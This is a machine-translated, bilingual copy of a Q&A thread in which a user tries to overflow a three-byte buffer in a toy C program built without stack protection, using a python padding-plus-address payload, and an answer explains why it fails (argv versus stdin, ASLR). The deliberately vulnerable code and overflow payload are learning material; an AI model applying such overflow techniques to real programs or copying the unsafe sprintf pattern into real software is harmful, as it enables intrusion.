如何利用段错误并运行 shell 命令?
[英]How can I exploit a segfault and run a shell command?
问题描述
Following this: How can I exploit a buffer overflow?
在此之后: 如何利用缓冲区溢出?
I have a code compiled using -fno-stack-protector :我有一个使用-fno-stack-protector编译的代码:
#include <stdio.h>
void shellcode(){
printf("\n Reached shellcode!");
}
int main(int argc, char **argv){
char buf[3];
sprintf(buf, "%s", argv[1]);
return 0;
}
but unable to execute the shellcode function.但无法执行shellcode函数。
Like in that post i am using:就像在那篇文章中我正在使用的那样:
python -c 'print "A"*27+"\x49\x11\x00\x00\x00\x00\x00\x00"' > input
./a < input
Get a segfault at:在以下位置获取段错误:
./a 12345678901
Segmentation fault (core dumped)
but nothing happens.但什么也没发生。
my main goal is to execute ls on linux os instead of shellcode function.我的主要目标是在 linux 操作系统上执行ls而不是shellcode函数。 but right now nothing works.但现在没有任何效果。
1 个解决方案
解决方案1
0 2022-05-17 09:09:57
There are two potential problems here:这里有两个潜在的问题:
By using
sprintf(.., argv[1]), you seem to be expecting input from argv.通过使用sprintf(.., argv[1]),您似乎期待来自 argv 的输入。 But./a < inputdirects the file to STDIN但是./a < input将文件定向到 STDINASLR could screw your exploit up.
ASLR 可能会搞砸你的漏洞利用。 Meaning that you don't know if the address is correct.这意味着您不知道地址是否正确。
It's very difficult to answer such questions without having the binary (a) itself, or at least the Makefile.如果没有二进制文件 (a) 本身,或者至少没有 Makefile,很难回答这样的问题。
If I were you, I would work with a debugger (GDB is great) until the exploit works.如果我是你,我会使用调试器(GDB 很棒),直到漏洞利用。 But it's worth noting that with ASLR, it would be tough.但值得注意的是,使用 ASLR 会很困难。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.